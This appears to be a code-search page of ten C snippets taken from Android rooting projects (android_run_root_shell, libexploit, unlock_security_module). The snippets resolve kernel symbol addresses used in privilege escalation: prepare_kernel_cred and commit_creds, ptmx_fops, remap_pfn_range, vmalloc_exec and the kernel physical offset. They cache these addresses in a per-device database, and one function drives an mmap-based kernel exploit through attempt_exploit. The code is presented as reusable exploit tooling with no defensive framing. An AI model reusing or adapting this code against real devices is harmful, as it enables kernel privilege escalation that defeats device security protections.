コード例 #1
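/*
 * Report whether the cached mmc_protect parameters are usable: the
 * mmc_protect_part value is non-zero and mmc_protect_part_type is one of
 * the three recognised MMC_PROTECT_PART_TYPE* values.
 */
static bool
mmc_protect_param_is_valid(void)
{
  if (!mmc_protect_part) {
    return false;
  }

  return mmc_protect_part_type == MMC_PROTECT_PART_TYPE1
      || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2
      || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3;
}

/*
 * Fill the mmc_protect_part / mmc_protect_part_type globals from the device
 * address table.
 *
 * Values already cached by an earlier call are reused as long as they pass
 * validation. Otherwise both values are read from the table; when the part
 * address is missing, detect_mmc_protect() is run and the lookup is repeated
 * (presumably detection stores its result in the table; confirm against
 * detect_mmc_protect()).
 *
 * Returns true when a non-zero address and a recognised part type are
 * available. On failure both globals are reset so that later code cannot
 * act on a half-initialised pair.
 */
static bool
setup_param_from_database(void)
{
  if (mmc_protect_param_is_valid()) {
    return true;
  }

  mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
  if (!mmc_protect_part) {
    detect_mmc_protect();

    mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
  }

  /* The part type is stored in the same table, under its own key. */
  mmc_protect_part_type = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type));

  if (mmc_protect_param_is_valid()) {
    return true;
  }

  mmc_protect_part = 0;
  mmc_protect_part_type = MMC_PROTECT_PART_TYPE_UNKNOWN;

  return false;
}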
コード例 #2
/*
 * Look up the table entries for prepare_kernel_cred and commit_creds (the
 * Linux kernel's credential-construction and credential-install routines)
 * and hand both back through the out-parameters.
 *
 * Both out-parameters are always written, even when a lookup yields 0.
 * Returns true only when both addresses are non-zero; otherwise the
 * "device not supported" reason is printed and false is returned.
 * The out-pointers themselves are not checked for NULL.
 */
static bool
get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address)
{
    void *prepare_fn = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
    void *commit_fn = (void *)device_get_symbol_address(DEVICE_SYMBOL(commit_creds));

    *prepare_kernel_cred_address = prepare_fn;
    *commit_creds_address = commit_fn;

    /* A single missing entry makes the pair unusable. */
    if (!prepare_fn || !commit_fn) {
        print_reason_device_not_supported();
        return false;
    }

    return true;
}
コード例 #3
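/*
 * Record `address` for `symbol` in the device address database, keyed by
 * the current device id.
 *
 * Returns true when the table already holds exactly this address or the
 * insert succeeds. Returns false when:
 *   - address is 0 (0 is what lookups return for "not found"),
 *   - a different non-zero address is already stored for the symbol (the
 *     existing entry is never overwritten; the conflict is printed), or
 *   - any SQLite step fails (the SQLite error text and code are printed).
 */
bool
device_set_symbol_address(device_symbol_t symbol, unsigned long int address)
{
  /*
   * Declared at function scope on purpose: the buffer is bound with
   * SQLITE_STATIC, so SQLite keeps the pointer instead of copying and reads
   * it when the statement executes. It must outlive execute_sql().
   */
  char hex_address[20] = { 0 };
  device_id_t device_id;
  unsigned long int old;
  sqlite3_stmt *st = NULL;
  bool ok;
  int rc;

  if (address == 0) {
    return false;
  }

  old = device_get_symbol_address(symbol);
  if (old == address) {
    return true;
  }

  if (old) {
    /* %lx matches the unsigned long arguments; %x is wrong where long is 64-bit. */
    printf("Duplicate symbol \"%s\": old = 0x%08lx, new = 0x%08lx\n", symbol, old, address);
    return false;
  }

  device_id = get_device_id(true);

  /* Each step runs only if every earlier step succeeded. */
  rc = sqlite3_prepare(db, SQL_REGISTER_DEVICE_ADDRESS, -1, &st, NULL);

  if (!IS_SQL_ERROR(rc)) {
    rc = sqlite3_reset(st);
  }

  if (!IS_SQL_ERROR(rc)) {
    rc = sqlite3_bind_int(st, 1, device_id);
  }

  if (!IS_SQL_ERROR(rc)) {
    rc = sqlite3_bind_text(st, 2, symbol, -1, SQLITE_STATIC);
  }

  if (!IS_SQL_ERROR(rc)) {
    /* Addresses are stored as "0x..." text, not as integers. */
    int length = snprintf(hex_address, sizeof(hex_address), "0x%08lx", address);
    rc = sqlite3_bind_text(st, 3, hex_address, length, SQLITE_STATIC);
  }

  if (!IS_SQL_ERROR(rc)) {
    rc = execute_sql(st);
  }

  ok = !IS_SQL_ERROR(rc);
  if (!ok) {
    printf("%s(%d)\n", sqlite3_errmsg(db), sqlite3_errcode(db));
  }

  /* sqlite3_finalize() accepts NULL, so this is safe if prepare failed. */
  sqlite3_finalize(st);

  return ok;
}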
コード例 #4
/*
 * Return the table entry for the delayed_rsp_id symbol as a pointer.
 *
 * When the table has no entry (lookup yields 0) the "device not supported"
 * reason is printed and NULL is returned.
 */
static void *
get_delayed_rsp_id_addresses(void)
{
  void *address = (void *)device_get_symbol_address(DEVICE_SYMBOL(delayed_rsp_id));

  if (!address) {
    print_reason_device_not_supported();
    return NULL;
  }

  return address;
}
コード例 #5
ファイル: mm.c プロジェクト: qiuqi/android_run_root_shell
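/*
 * Resolve the remap_pfn_range global once and cache it.
 *
 * Lookup order: the value cached by an earlier call, then the device address
 * table, then kallsyms_get_symbol_address() when kallsyms_exist() reports
 * that symbol information is available.
 *
 * Returns true when remap_pfn_range ends up non-null.
 */
bool
setup_remap_pfn_range_address(void)
{
  if (remap_pfn_range) {
    return true;
  }

  remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range));

  if (!remap_pfn_range && kallsyms_exist()) {
    /* Explicit cast, as in the table lookup above: the target is a pointer. */
    remap_pfn_range = (void *)kallsyms_get_symbol_address("remap_pfn_range");
  }

  return !!remap_pfn_range;
}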
コード例 #6
/*
 * Resolve the vmalloc_exec global once and cache it.
 *
 * A value left by an earlier call is kept. Otherwise the device address
 * table is consulted first, and kallsyms_get_symbol_address() is tried only
 * when the table has no entry and kallsyms_exist() is true.
 *
 * Returns true when vmalloc_exec is non-null afterwards.
 */
bool
setup_vmalloc_exec_address(void)
{
  if (!vmalloc_exec) {
    vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec));

    if (!vmalloc_exec && kallsyms_exist()) {
      vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec");
    }
  }

  return vmalloc_exec ? true : false;
}
コード例 #7
ファイル: exploit.c プロジェクト: bincker/libexploit
/*
 * Return the kernel physical offset to use.
 *
 * Sources are tried in order: the device address table, then
 * find_kernel_text_from_iomem(). If both yield 0, the compiled-in
 * default_kernel_physical_offset is returned, so this function never
 * reports failure to its caller.
 */
static unsigned long int
get_kernel_physical_offset(void)
{
  unsigned long int found = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));

  if (found == 0) {
    found = find_kernel_text_from_iomem();
  }

  if (found == 0) {
    /* Nothing device-specific was found; fall back to the default. */
    return default_kernel_physical_offset;
  }

  return found;
}
コード例 #8
ファイル: ptmx.c プロジェクト: Velmy/unlock_security_module
/*
 * Return the address recorded for the ptmx_fops symbol, or 0 when it cannot
 * be resolved.
 *
 * The device address table is consulted first; kallsyms_get_symbol_address()
 * is used only when the table has no entry and kallsyms_exist() is true.
 */
static unsigned long int
get_ptmx_fops_address(void)
{
  unsigned long int found = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops));

  if (!found && kallsyms_exist()) {
    found = kallsyms_get_symbol_address("ptmx_fops");
  }

  /* Still 0 here means neither source knew the symbol. */
  return found;
}
コード例 #9
/*
 * Populate the kernel_physical_offset variable.
 *
 * Three sources are tried in order, and the first non-zero result wins:
 * the device address table, find_kernel_text_from_iomem(), then
 * find_kernel_text_from_config().
 *
 * Returns true when a non-zero offset was stored. Otherwise the
 * "device not supported" reason is printed, kernel_physical_offset is left
 * at 0, and false is returned.
 */
static bool
setup_variables(void)
{
  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));

  if (!kernel_physical_offset) {
    kernel_physical_offset = find_kernel_text_from_iomem();
  }

  if (!kernel_physical_offset) {
    kernel_physical_offset = find_kernel_text_from_config();
  }

  if (!kernel_physical_offset) {
    print_reason_device_not_supported();
    return false;
  }

  return true;
}
コード例 #10
ファイル: mm.c プロジェクト: qiuqi/android_run_root_shell
/*
 * Run `callback` through the mmap-based path.
 *
 * run_exploit_mmap() is tried first; when it returns true, the result it
 * stored is returned unchanged. Otherwise three prerequisites are resolved
 * in order, and the function prints a message and returns false at the
 * first one that is missing:
 *   1. remap_pfn_range         (setup_remap_pfn_range_address)
 *   2. ptmx_fops_mmap_address  (setup_ptmx_fops_mmap_address)
 *   3. the kernel physical offset, from the device address table or, when
 *      the table has none, from detect_kernel_phys_parameters()
 *
 * With all three available, the return value is that of attempt_exploit().
 */
bool
run_with_mmap(memory_callback_t callback)
{
  unsigned long int stored_offset;
  bool mmap_result;

  if (run_exploit_mmap(callback, &mmap_result)) {
    return mmap_result;
  }

  setup_remap_pfn_range_address();
  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    return false;
  }

  setup_ptmx_fops_mmap_address();
  if (!ptmx_fops_mmap_address) {
    printf("You need to manage to get ptmx_fops addresses.\n");
    return false;
  }

  stored_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (!stored_offset) {
    /* No table entry: detection has to supply the parameters itself. */
    if (!detect_kernel_phys_parameters()) {
      printf("You need to manage to get kernel_physical_offset addresses.\n");
      return false;
    }
  }
  else {
    /*
     * NOTE(review): the stored value is reduced by 0x8000 before use;
     * presumably the table holds the kernel text start rather than the
     * physical base. Confirm against set_kernel_phys_offset().
     */
    set_kernel_phys_offset(stored_offset - 0x00008000);
  }

  return attempt_exploit(ptmx_fops_mmap_address,
                         (unsigned long int)&ptmx_mmap, 0,
                         run_callback_with_mmap, callback);
}